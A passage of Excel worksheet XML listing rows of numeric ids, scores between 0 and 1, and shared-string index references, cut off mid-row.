    <row r="4919" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4919" s="1">
        <v>4917</v>
      </c>
      <c r="B4919">
        <v>2405</v>
      </c>
      <c r="C4919">
        <v>2405</v>
      </c>
      <c r="D4919">
        <v>2</v>
      </c>
      <c r="E4919">
        <v>0.99779999256134033</v>
      </c>
      <c r="F4919" t="s">
        <v>5592</v>
      </c>
      <c r="G4919" t="s">
        <v>9724</v>
      </c>
      <c r="H4919" t="s">
        <v>9725</v>
      </c>
    </row>
    <row r="4920" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4920" s="1">
        <v>4918</v>
      </c>
      <c r="B4920">
        <v>6930</v>
      </c>
      <c r="C4920">
        <v>6930</v>
      </c>
      <c r="D4920">
        <v>2</v>
      </c>
      <c r="E4920">
        <v>0.45649999380111689</v>
      </c>
      <c r="F4920" t="s">
        <v>5592</v>
      </c>
      <c r="G4920" t="s">
        <v>9726</v>
      </c>
      <c r="H4920" t="s">
        <v>9727</v>
      </c>
    </row>
    <row r="4921" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4921" s="1">
        <v>4919</v>
      </c>
      <c r="B4921">
        <v>2406</v>
      </c>
      <c r="C4921">
        <v>2406</v>
      </c>
      <c r="D4921">
        <v>2</v>
      </c>
      <c r="E4921">
        <v>0.96810001134872437</v>
      </c>
      <c r="F4921" t="s">
        <v>5592</v>
      </c>
      <c r="G4921" t="s">
        <v>9728</v>
      </c>
      <c r="H4921" t="s">
        <v>9729</v>
      </c>
    </row>
    <row r="4922" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4922" s="1">
        <v>4920</v>
      </c>
      <c r="B4922">
        <v>2211</v>
      </c>
      <c r="C4922">
        <v>2211</v>
      </c>
      <c r="D4922">
        <v>2</v>
      </c>
      <c r="E4922">
        <v>0.5658000111579895</v>
      </c>
      <c r="F4922" t="s">
        <v>5592</v>
      </c>
      <c r="G4922" t="s">
        <v>9730</v>
      </c>
      <c r="H4922" t="s">
        <v>9731</v>
      </c>
    </row>
    <row r="4923" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4923" s="1">
        <v>4921</v>
      </c>
      <c r="B4923">
        <v>2209</v>
      </c>
      <c r="C4923">
        <v>2209</v>
      </c>
      <c r="D4923">
        <v>2</v>
      </c>
      <c r="E4923">
        <v>0.81840002536773682</v>
      </c>
      <c r="F4923" t="s">
        <v>5592</v>
      </c>
      <c r="G4923" t="s">
        <v>9732</v>
      </c>
      <c r="H4923" t="s">
        <v>9733</v>
      </c>
    </row>
    <row r="4924" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4924" s="1">
        <v>4922</v>
      </c>
      <c r="B4924">
        <v>2208</v>
      </c>
      <c r="C4924">
        <v>2208</v>
      </c>
      <c r="D4924">
        <v>2</v>
      </c>
      <c r="E4924">
        <v>0.99769997596740723</v>
      </c>
      <c r="F4924" t="s">
        <v>5592</v>
      </c>
      <c r="G4924" t="s">
        <v>9734</v>
      </c>
      <c r="H4924" t="s">
        <v>9735</v>
      </c>
    </row>
    <row r="4925" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4925" s="1">
        <v>4923</v>
      </c>
      <c r="B4925">
        <v>2203</v>
      </c>
      <c r="C4925">
        <v>2203</v>
      </c>
      <c r="D4925">
        <v>2</v>
      </c>
      <c r="E4925">
        <v>0.88330000638961792</v>
      </c>
      <c r="F4925" t="s">
        <v>5592</v>
      </c>
      <c r="G4925" t="s">
        <v>9736</v>
      </c>
      <c r="H4925" t="s">
        <v>9737</v>
      </c>
    </row>
    <row r="4926" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4926" s="1">
        <v>4924</v>
      </c>
      <c r="B4926">
        <v>2437</v>
      </c>
      <c r="C4926">
        <v>2437</v>
      </c>
      <c r="D4926">
        <v>2</v>
      </c>
      <c r="E4926">
        <v>0.71329998970031738</v>
      </c>
      <c r="F4926" t="s">
        <v>5592</v>
      </c>
      <c r="G4926" t="s">
        <v>9738</v>
      </c>
      <c r="H4926" t="s">
        <v>9739</v>
      </c>
    </row>
    <row r="4927" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4927" s="1">
        <v>4925</v>
      </c>
      <c r="B4927">
        <v>2441</v>
      </c>
      <c r="C4927">
        <v>2441</v>
      </c>
      <c r="D4927">
        <v>2</v>
      </c>
      <c r="E4927">
        <v>0.6525999903678894</v>
      </c>
      <c r="F4927" t="s">
        <v>5592</v>
      </c>
      <c r="G4927" t="s">
        <v>9740</v>
      </c>
      <c r="H4927" t="s">
        <v>9741</v>
      </c>
    </row>
    <row r="4928" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4928" s="1">
        <v>4926</v>
      </c>
      <c r="B4928">
        <v>2443</v>
      </c>
      <c r="C4928">
        <v>2443</v>
      </c>
      <c r="D4928">
        <v>2</v>
      </c>
      <c r="E4928">
        <v>0.69450002908706665</v>
      </c>
      <c r="F4928" t="s">
        <v>5592</v>
      </c>
      <c r="G4928" t="s">
        <v>9742</v>
      </c>
      <c r="H4928" t="s">
        <v>9743</v>
      </c>
    </row>
    <row r="4929" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4929" s="1">
        <v>4927</v>
      </c>
      <c r="B4929">
        <v>2178</v>
      </c>
      <c r="C4929">
        <v>2178</v>
      </c>
      <c r="D4929">
        <v>2</v>
      </c>
      <c r="E4929">
        <v>0.69019997119903564</v>
      </c>
      <c r="F4929" t="s">
        <v>5592</v>
      </c>
      <c r="G4929" t="s">
        <v>9744</v>
      </c>
      <c r="H4929" t="s">
        <v>9745</v>
      </c>
    </row>
    <row r="4930" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4930" s="1">
        <v>4928</v>
      </c>
      <c r="B4930">
        <v>2168</v>
      </c>
      <c r="C4930">
        <v>2168</v>
      </c>
      <c r="D4930">
        <v>2</v>
      </c>
      <c r="E4930">
        <v>0.75959998369216919</v>
      </c>
      <c r="F4930" t="s">
        <v>5592</v>
      </c>
      <c r="G4930" t="s">
        <v>9746</v>
      </c>
      <c r="H4930" t="s">
        <v>9747</v>
      </c>
    </row>
    <row r="4931" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4931" s="1">
        <v>4929</v>
      </c>
      <c r="B4931">
        <v>6957</v>
      </c>
      <c r="C4931">
        <v>6957</v>
      </c>
      <c r="D4931">
        <v>2</v>
      </c>
      <c r="E4931">
        <v>0.91939997673034668</v>
      </c>
      <c r="F4931" t="s">
        <v>5592</v>
      </c>
      <c r="G4931" t="s">
        <v>9748</v>
      </c>
      <c r="H4931" t="s">
        <v>9749</v>
      </c>
    </row>
    <row r="4932" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4932" s="1">
        <v>4930</v>
      </c>
      <c r="B4932">
        <v>6809</v>
      </c>
      <c r="C4932">
        <v>6809</v>
      </c>
      <c r="D4932">
        <v>2</v>
      </c>
      <c r="E4932">
        <v>0.81440001726150513</v>
      </c>
      <c r="F4932" t="s">
        <v>5592</v>
      </c>
      <c r="G4932" t="s">
        <v>9750</v>
      </c>
      <c r="H4932" t="s">
        <v>9751</v>
      </c>
    </row>
    <row r="4933" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4933" s="1">
        <v>4931</v>
      </c>
      <c r="B4933">
        <v>2496</v>
      </c>
      <c r="C4933">
        <v>2496</v>
      </c>
      <c r="D4933">
        <v>2</v>
      </c>
      <c r="E4933">
        <v>0.62410002946853638</v>
      </c>
      <c r="F4933" t="s">
        <v>5592</v>
      </c>
      <c r="G4933" t="s">
        <v>9752</v>
      </c>
      <c r="H4933" t="s">
        <v>9753</v>
      </c>
    </row>
    <row r="4934" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4934" s="1">
        <v>4932</v>
      </c>
      <c r="B4934">
        <v>6958</v>
      </c>
      <c r="C4934">
        <v>6958</v>
      </c>
      <c r="D4934">
        <v>2</v>
      </c>
      <c r="E4934">
        <v>0.99699997901916504</v>
      </c>
      <c r="F4934" t="s">
        <v>5592</v>
      </c>
      <c r="G4934" t="s">
        <v>9754</v>
      </c>
      <c r="H4934" t="s">
        <v>9755</v>
      </c>
    </row>
    <row r="4935" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4935" s="1">
        <v>4933</v>
      </c>
      <c r="B4935">
        <v>6805</v>
      </c>
      <c r="C4935">
        <v>6805</v>
      </c>
      <c r="D4935">
        <v>2</v>
      </c>
      <c r="E4935">
        <v>0.9156000018119812</v>
      </c>
      <c r="F4935" t="s">
        <v>5592</v>
      </c>
      <c r="G4935" t="s">
        <v>9756</v>
      </c>
      <c r="H4935" t="s">
        <v>9757</v>
      </c>
    </row>
    <row r="4936" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4936" s="1">
        <v>4934</v>
      </c>
      <c r="B4936">
        <v>6959</v>
      </c>
      <c r="C4936">
        <v>6959</v>
      </c>
      <c r="D4936">
        <v>2</v>
      </c>
      <c r="E4936">
        <v>0.98580002784729004</v>
      </c>
      <c r="F4936" t="s">
        <v>5592</v>
      </c>
      <c r="G4936" t="s">
        <v>9758</v>
      </c>
      <c r="H4936" t="s">
        <v>9759</v>
      </c>
    </row>
    <row r="4937" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4937" s="1">
        <v>4935</v>
      </c>
      <c r="B4937">
        <v>6803</v>
      </c>
      <c r="C4937">
        <v>6803</v>
      </c>
      <c r="D4937">
        <v>2</v>
      </c>
      <c r="E4937">
        <v>0.63139998912811279</v>
      </c>
      <c r="F4937" t="s">
        <v>5592</v>
      </c>
      <c r="G4937" t="s">
        <v>9760</v>
      </c>
      <c r="H4937" t="s">
        <v>9761</v>
      </c>
    </row>
    <row r="4938" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4938" s="1">
        <v>4936</v>
      </c>
      <c r="B4938">
        <v>2503</v>
      </c>
      <c r="C4938">
        <v>2503</v>
      </c>
      <c r="D4938">
        <v>2</v>
      </c>
      <c r="E4938">
        <v>0.99690002202987671</v>
      </c>
      <c r="F4938" t="s">
        <v>5592</v>
      </c>
      <c r="G4938" t="s">
        <v>9762</v>
      </c>
      <c r="H4938" t="s">
        <v>9763</v>
      </c>
    </row>
    <row r="4939" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4939" s="1">
        <v>4937</v>
      </c>
      <c r="B4939">
        <v>2163</v>
      </c>
      <c r="C4939">
        <v>2163</v>
      </c>
      <c r="D4939">
        <v>2</v>
      </c>
      <c r="E4939">
        <v>0.99279999732971191</v>
      </c>
      <c r="F4939" t="s">
        <v>5592</v>
      </c>
      <c r="G4939" t="s">
        <v>9764</v>
      </c>
      <c r="H4939" t="s">
        <v>9765</v>
      </c>
    </row>
    <row r="4940" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4940" s="1">
        <v>4938</v>
      </c>
      <c r="B4940">
        <v>6797</v>
      </c>
      <c r="C4940">
        <v>6797</v>
      </c>
      <c r="D4940">
        <v>2</v>
      </c>
      <c r="E4940">
        <v>0.9617999792098999</v>
      </c>
      <c r="F4940" t="s">
        <v>5592</v>
      </c>
      <c r="G4940" t="s">
        <v>9766</v>
      </c>
      <c r="H4940" t="s">
        <v>9767</v>
      </c>
    </row>
    <row r="4941" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4941" s="1">
        <v>4939</v>
      </c>
      <c r="B4941">
        <v>6796</v>
      </c>
      <c r="C4941">
        <v>6796</v>
      </c>
      <c r="D4941">
        <v>2</v>
      </c>
      <c r="E4941">
        <v>0.98199999332427979</v>
      </c>
      <c r="F4941" t="s">
        <v>5592</v>
      </c>
      <c r="G4941" t="s">
        <v>9768</v>
      </c>
      <c r="H4941" t="s">
        <v>9769</v>
      </c>
    </row>
    <row r="4942" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4942" s="1">
        <v>4940</v>
      </c>
      <c r="B4942">
        <v>2522</v>
      </c>
      <c r="C4942">
        <v>2522</v>
      </c>
      <c r="D4942">
        <v>2</v>
      </c>
      <c r="E4942">
        <v>0.99479997158050537</v>
      </c>
      <c r="F4942" t="s">
        <v>5592</v>
      </c>
      <c r="G4942" t="s">
        <v>9770</v>
      </c>
      <c r="H4942" t="s">
        <v>9771</v>
      </c>
    </row>
    <row r="4943" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4943" s="1">
        <v>4941</v>
      </c>
      <c r="B4943">
        <v>2523</v>
      </c>
      <c r="C4943">
        <v>2523</v>
      </c>
      <c r="D4943">
        <v>2</v>
      </c>
      <c r="E4943">
        <v>0.92009997367858887</v>
      </c>
      <c r="F4943" t="s">
        <v>5592</v>
      </c>
      <c r="G4943" t="s">
        <v>9772</v>
      </c>
      <c r="H4943" t="s">
        <v>9773</v>
      </c>
    </row>
    <row r="4944" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4944" s="1">
        <v>4942</v>
      </c>
      <c r="B4944">
        <v>2488</v>
      </c>
      <c r="C4944">
        <v>2488</v>
      </c>
      <c r="D4944">
        <v>2</v>
      </c>
      <c r="E4944">
        <v>0.99930000305175781</v>
      </c>
      <c r="F4944" t="s">
        <v>5592</v>
      </c>
      <c r="G4944" t="s">
        <v>9774</v>
      </c>
      <c r="H4944" t="s">
        <v>9775</v>
      </c>
    </row>
    <row r="4945" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4945" s="1">
        <v>4943</v>
      </c>
      <c r="B4945">
        <v>2487</v>
      </c>
      <c r="C4945">
        <v>2487</v>
      </c>
      <c r="D4945">
        <v>2</v>
      </c>
      <c r="E4945">
        <v>0.99699997901916504</v>
      </c>
      <c r="F4945" t="s">
        <v>5592</v>
      </c>
      <c r="G4945" t="s">
        <v>9776</v>
      </c>
      <c r="H4945" t="s">
        <v>9777</v>
      </c>
    </row>
    <row r="4946" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4946" s="1">
        <v>4944</v>
      </c>
      <c r="B4946">
        <v>6816</v>
      </c>
      <c r="C4946">
        <v>6816</v>
      </c>
      <c r="D4946">
        <v>2</v>
      </c>
      <c r="E4946">
        <v>0.78219997882843018</v>
      </c>
      <c r="F4946" t="s">
        <v>5592</v>
      </c>
      <c r="G4946" t="s">
        <v>9778</v>
      </c>
      <c r="H4946" t="s">
        <v>9779</v>
      </c>
    </row>
    <row r="4947" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4947" s="1">
        <v>4945</v>
      </c>
      <c r="B4947">
        <v>2482</v>
      </c>
      <c r="C4947">
        <v>2482</v>
      </c>
      <c r="D4947">
        <v>2</v>
      </c>
      <c r="E4947">
        <v>0.86030000448226929</v>
      </c>
      <c r="F4947" t="s">
        <v>5592</v>
      </c>
      <c r="G4947" t="s">
        <v>9780</v>
      </c>
      <c r="H4947" t="s">
        <v>9781</v>
      </c>
    </row>
    <row r="4948" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4948" s="1">
        <v>4946</v>
      </c>
      <c r="B4948">
        <v>6943</v>
      </c>
      <c r="C4948">
        <v>6943</v>
      </c>
      <c r="D4948">
        <v>2</v>
      </c>
      <c r="E4948">
        <v>0.99229997396469116</v>
      </c>
      <c r="F4948" t="s">
        <v>5592</v>
      </c>
      <c r="G4948" t="s">
        <v>9782</v>
      </c>
      <c r="H4948" t="s">
        <v>9783</v>
      </c>
    </row>
    <row r="4949" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4949" s="1">
        <v>4947</v>
      </c>
      <c r="B4949">
        <v>2187</v>
      </c>
      <c r="C4949">
        <v>2187</v>
      </c>
      <c r="D4949">
        <v>2</v>
      </c>
      <c r="E4949">
        <v>0.85799998044967651</v>
      </c>
      <c r="F4949" t="s">
        <v>5592</v>
      </c>
      <c r="G4949" t="s">
        <v>9784</v>
      </c>
      <c r="H4949" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="4950" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4950" s="1">
        <v>4948</v>
      </c>
      <c r="B4950">
        <v>2446</v>
      </c>
      <c r="C4950">
        <v>2446</v>
      </c>
      <c r="D4950">
        <v>2</v>
      </c>
      <c r="E4950">
        <v>0.41710001230239868</v>
      </c>
      <c r="F4950" t="s">
        <v>5592</v>
      </c>
      <c r="G4950" t="s">
        <v>9786</v>
      </c>
      <c r="H4950" t="s">
        <v>9787</v>
      </c>
    </row>
    <row r="4951" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4951" s="1">
        <v>4949</v>
      </c>
      <c r="B4951">
        <v>6946</v>
      </c>
      <c r="C4951">
        <v>6946</v>
      </c>
      <c r="D4951">
        <v>2</v>
      </c>
      <c r="E4951">
        <v>0.8148999810218811</v>
      </c>
      <c r="F4951" t="s">
        <v>5592</v>
      </c>
      <c r="G4951" t="s">
        <v>9788</v>
      </c>
      <c r="H4951" t="s">
        <v>9789</v>
      </c>
    </row>
    <row r="4952" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4952" s="1">
        <v>4950</v>
      </c>
      <c r="B4952">
        <v>6826</v>
      </c>
      <c r="C4952">
        <v>6826</v>
      </c>
      <c r="D4952">
        <v>2</v>
      </c>
      <c r="E4952">
        <v>0.99739998579025269</v>
      </c>
      <c r="F4952" t="s">
        <v>5592</v>
      </c>
      <c r="G4952" t="s">
        <v>9790</v>
      </c>
      <c r="H4952" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4953" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4953" s="1">
        <v>4951</v>
      </c>
      <c r="B4953">
        <v>6825</v>
      </c>
      <c r="C4953">
        <v>6825</v>
      </c>
      <c r="D4953">
        <v>2</v>
      </c>
      <c r="E4953">
        <v>0.58539998531341553</v>
      </c>
      <c r="F4953" t="s">
        <v>5592</v>
      </c>
      <c r="G4953" t="s">
        <v>9792</v>
      </c>
      <c r="H4953" t="s">
        <v>6284</v>
      </c>
    </row>
    <row r="4954" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4954" s="1">
        <v>4952</v>
      </c>
      <c r="B4954">
        <v>2455</v>
      </c>
      <c r="C4954">
        <v>2455</v>
      </c>
      <c r="D4954">
        <v>2</v>
      </c>
      <c r="E4954">
        <v>0.77270001173019409</v>
      </c>
      <c r="F4954" t="s">
        <v>5592</v>
      </c>
      <c r="G4954" t="s">
        <v>9793</v>
      </c>
      <c r="H4954" t="s">
        <v>9794</v>
      </c>
    </row>
    <row r="4955" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4955" s="1">
        <v>4953</v>
      </c>
      <c r="B4955">
        <v>2391</v>
      </c>
      <c r="C4955">
        <v>2391</v>
      </c>
      <c r="D4955">
        <v>2</v>
      </c>
      <c r="E4955">
        <v>0.77960002422332764</v>
      </c>
      <c r="F4955" t="s">
        <v>5592</v>
      </c>
      <c r="G4955" t="s">
        <v>9795</v>
      </c>
      <c r="H4955" t="s">
        <v>9796</v>
      </c>
    </row>
    <row r="4956" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4956" s="1">
        <v>4954</v>
      </c>
      <c r="B4956">
        <v>6821</v>
      </c>
      <c r="C4956">
        <v>6821</v>
      </c>
      <c r="D4956">
        <v>2</v>
      </c>
      <c r="E4956">
        <v>0.63749998807907104</v>
      </c>
      <c r="F4956" t="s">
        <v>5592</v>
      </c>
      <c r="G4956" t="s">
        <v>9797</v>
      </c>
      <c r="H4956" t="s">
        <v>9798</v>
      </c>
    </row>
    <row r="4957" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4957" s="1">
        <v>4955</v>
      </c>
      <c r="B4957">
        <v>2183</v>
      </c>
      <c r="C4957">
        <v>2183</v>
      </c>
      <c r="D4957">
        <v>2</v>
      </c>
      <c r="E4957">
        <v>0.52710002660751343</v>
      </c>
      <c r="F4957" t="s">
        <v>5592</v>
      </c>
      <c r="G4957" t="s">
        <v>9799</v>
      </c>
      <c r="H4957" t="s">
        <v>9800</v>
      </c>
    </row>
    <row r="4958" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4958" s="1">
        <v>4956</v>
      </c>
      <c r="B4958">
        <v>6948</v>
      </c>
      <c r="C4958">
        <v>6948</v>
      </c>
      <c r="D4958">
        <v>2</v>
      </c>
      <c r="E4958">
        <v>0.5494999885559082</v>
      </c>
      <c r="F4958" t="s">
        <v>5592</v>
      </c>
      <c r="G4958" t="s">
        <v>9801</v>
      </c>
      <c r="H4958" t="s">
        <v>9802</v>
      </c>
    </row>
    <row r="4959" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4959" s="1">
        <v>4957</v>
      </c>
      <c r="B4959">
        <v>2475</v>
      </c>
      <c r="C4959">
        <v>2475</v>
      </c>
      <c r="D4959">
        <v>2</v>
      </c>
      <c r="E4959">
        <v>0.89499998092651367</v>
      </c>
      <c r="F4959" t="s">
        <v>5592</v>
      </c>
      <c r="G4959" t="s">
        <v>9803</v>
      </c>
      <c r="H4959" t="s">
        <v>9804</v>
      </c>
    </row>
    <row r="4960" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4960" s="1">
        <v>4958</v>
      </c>
      <c r="B4960">
        <v>2179</v>
      </c>
      <c r="C4960">
        <v>2179</v>
      </c>
      <c r="D4960">
        <v>2</v>
      </c>
      <c r="E4960">
        <v>0.43540000915527338</v>
      </c>
      <c r="F4960" t="s">
        <v>5592</v>
      </c>
      <c r="G4960" t="s">
        <v>9805</v>
      </c>
      <c r="H4960" t="s">
        <v>9806</v>
      </c>
    </row>
    <row r="4961" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4961" s="1">
        <v>4959</v>
      </c>
      <c r="B4961">
        <v>6896</v>
      </c>
      <c r="C4961">
        <v>6896</v>
      </c>
      <c r="D4961">
        <v>2</v>
      </c>
      <c r="E4961">
        <v>0.92009997367858887</v>
      </c>
      <c r="F4961" t="s">
        <v>5592</v>
      </c>
      <c r="G4961" t="s">
        <v>9807</v>
      </c>
      <c r="H4961" t="s">
        <v>9808</v>
      </c>
    </row>
    <row r="4962" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4962" s="1">
        <v>4960</v>
      </c>
      <c r="B4962">
        <v>6817</v>
      </c>
      <c r="C4962">
        <v>6817</v>
      </c>
      <c r="D4962">
        <v>2</v>
      </c>
      <c r="E4962">
        <v>0.99529999494552612</v>
      </c>
      <c r="F4962" t="s">
        <v>5592</v>
      </c>
      <c r="G4962" t="s">
        <v>9809</v>
      </c>
      <c r="H4962" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="4963" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4963" s="1">
        <v>4961</v>
      </c>
      <c r="B4963">
        <v>2481</v>
      </c>
      <c r="C4963">
        <v>2481</v>
      </c>
      <c r="D4963">
        <v>2</v>
      </c>
      <c r="E4963">
        <v>0.50669997930526733</v>
      </c>
      <c r="F4963" t="s">
        <v>5592</v>
      </c>
      <c r="G4963" t="s">
        <v>9811</v>
      </c>
      <c r="H4963" t="s">
        <v>9812</v>
      </c>
    </row>
    <row r="4964" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4964" s="1">
        <v>4962</v>
      </c>
      <c r="B4964">
        <v>2471</v>
      </c>
      <c r="C4964">
        <v>2471</v>
      </c>
      <c r="D4964">
        <v>2</v>
      </c>
      <c r="E4964">
        <v>0.55769997835159302</v>
      </c>
      <c r="F4964" t="s">
        <v>5592</v>
      </c>
      <c r="G4964" t="s">
        <v>9813</v>
      </c>
      <c r="H4964" t="s">
        <v>9814</v>
      </c>
    </row>
    <row r="4965" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4965" s="1">
        <v>4963</v>
      </c>
      <c r="B4965">
        <v>2390</v>
      </c>
      <c r="C4965">
        <v>2390</v>
      </c>
      <c r="D4965">
        <v>2</v>
      </c>
      <c r="E4965">
        <v>0.76459997892379761</v>
      </c>
      <c r="F4965" t="s">
        <v>5592</v>
      </c>
      <c r="G4965" t="s">
        <v>9815</v>
      </c>
      <c r="H4965" t="s">
        <v>9816</v>
      </c>
    </row>
    <row r="4966" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4966" s="1">
        <v>4964</v>
      </c>
      <c r="B4966">
        <v>2222</v>
      </c>
      <c r="C4966">
        <v>2222</v>
      </c>
      <c r="D4966">
        <v>2</v>
      </c>
      <c r="E4966">
        <v>0.5374000072479248</v>
      </c>
      <c r="F4966" t="s">
        <v>5592</v>
      </c>
      <c r="G4966" t="s">
        <v>9817</v>
      </c>
      <c r="H4966" t="s">
        <v>9818</v>
      </c>
    </row>
    <row r="4967" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4967" s="1">
        <v>4965</v>
      </c>
      <c r="B4967">
        <v>2389</v>
      </c>
      <c r="C4967">
        <v>2389</v>
      </c>
      <c r="D4967">
        <v>2</v>
      </c>
      <c r="E4967">
        <v>0.64819997549057007</v>
      </c>
      <c r="F4967" t="s">
        <v>5592</v>
      </c>
      <c r="G4967" t="s">
        <v>9819</v>
      </c>
      <c r="H4967" t="s">
        <v>9820</v>
      </c>
    </row>
    <row r="4968" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4968" s="1">
        <v>4966</v>
      </c>
      <c r="B4968">
        <v>6885</v>
      </c>
      <c r="C4968">
        <v>6885</v>
      </c>
      <c r="D4968">
        <v>2</v>
      </c>
      <c r="E4968">
        <v>0.99699997901916504</v>
      </c>
      <c r="F4968" t="s">
        <v>5592</v>
      </c>
      <c r="G4968" t="s">
        <v>9821</v>
      </c>
      <c r="H4968" t="s">
        <v>9822</v>
      </c>
    </row>
    <row r="4969" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4969" s="1">
        <v>4967</v>
      </c>
      <c r="B4969">
        <v>2327</v>
      </c>
      <c r="C4969">
        <v>2327</v>
      </c>
      <c r="D4969">
        <v>2</v>
      </c>
      <c r="E4969">
        <v>0.44310000538825989</v>
      </c>
      <c r="F4969" t="s">
        <v>5592</v>
      </c>
      <c r="G4969" t="s">
        <v>9823</v>
      </c>
      <c r="H4969" t="s">
        <v>9824</v>
      </c>
    </row>
    <row r="4970" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4970" s="1">
        <v>4968</v>
      </c>
      <c r="B4970">
        <v>2329</v>
      </c>
      <c r="C4970">
        <v>2329</v>
      </c>
      <c r="D4970">
        <v>2</v>
      </c>
      <c r="E4970">
        <v>0.99510002136230469</v>
      </c>
      <c r="F4970" t="s">
        <v>5592</v>
      </c>
      <c r="G4970" t="s">
        <v>9825</v>
      </c>
      <c r="H4970" t="s">
        <v>9826</v>
      </c>
    </row>
    <row r="4971" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4971" s="1">
        <v>4969</v>
      </c>
      <c r="B4971">
        <v>2330</v>
      </c>
      <c r="C4971">
        <v>2330</v>
      </c>
      <c r="D4971">
        <v>2</v>
      </c>
      <c r="E4971">
        <v>0.5195000171661377</v>
      </c>
      <c r="F4971" t="s">
        <v>5592</v>
      </c>
      <c r="G4971" t="s">
        <v>9827</v>
      </c>
      <c r="H4971" t="s">
        <v>9828</v>
      </c>
    </row>
    <row r="4972" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4972" s="1">
        <v>4970</v>
      </c>
      <c r="B4972">
        <v>6881</v>
      </c>
      <c r="C4972">
        <v>6881</v>
      </c>
      <c r="D4972">
        <v>2</v>
      </c>
      <c r="E4972">
        <v>0.99199998378753662</v>
      </c>
      <c r="F4972" t="s">
        <v>5592</v>
      </c>
      <c r="G4972" t="s">
        <v>9829</v>
      </c>
      <c r="H4972" t="s">
        <v>9830</v>
      </c>
    </row>
    <row r="4973" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4973" s="1">
        <v>4971</v>
      </c>
      <c r="B4973">
        <v>6880</v>
      </c>
      <c r="C4973">
        <v>6880</v>
      </c>
      <c r="D4973">
        <v>2</v>
      </c>
      <c r="E4973">
        <v>0.6567000150680542</v>
      </c>
      <c r="F4973" t="s">
        <v>5592</v>
      </c>
      <c r="G4973" t="s">
        <v>9831</v>
      </c>
      <c r="H4973" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="4974" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4974" s="1">
        <v>4972</v>
      </c>
      <c r="B4974">
        <v>6878</v>
      </c>
      <c r="C4974">
        <v>6878</v>
      </c>
      <c r="D4974">
        <v>2</v>
      </c>
      <c r="E4974">
        <v>0.99830001592636108</v>
      </c>
      <c r="F4974" t="s">
        <v>5592</v>
      </c>
      <c r="G4974" t="s">
        <v>9833</v>
      </c>
      <c r="H4974" t="s">
        <v>9834</v>
      </c>
    </row>
    <row r="4975" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4975" s="1">
        <v>4973</v>
      </c>
      <c r="B4975">
        <v>6877</v>
      </c>
      <c r="C4975">
        <v>6877</v>
      </c>
      <c r="D4975">
        <v>2</v>
      </c>
      <c r="E4975">
        <v>0.81160002946853638</v>
      </c>
      <c r="F4975" t="s">
        <v>5592</v>
      </c>
      <c r="G4975" t="s">
        <v>9835</v>
      </c>
      <c r="H4975" t="s">
        <v>9836</v>
      </c>
    </row>
    <row r="4976" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4976" s="1">
        <v>4974</v>
      </c>
      <c r="B4976">
        <v>2269</v>
      </c>
      <c r="C4976">
        <v>2269</v>
      </c>
      <c r="D4976">
        <v>2</v>
      </c>
      <c r="E4976">
        <v>0.93180000782012939</v>
      </c>
      <c r="F4976" t="s">
        <v>5592</v>
      </c>
      <c r="G4976" t="s">
        <v>9837</v>
      </c>
      <c r="H4976" t="s">
        <v>9838</v>
      </c>
    </row>
    <row r="4977" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4977" s="1">
        <v>4975</v>
      </c>
      <c r="B4977">
        <v>2268</v>
      </c>
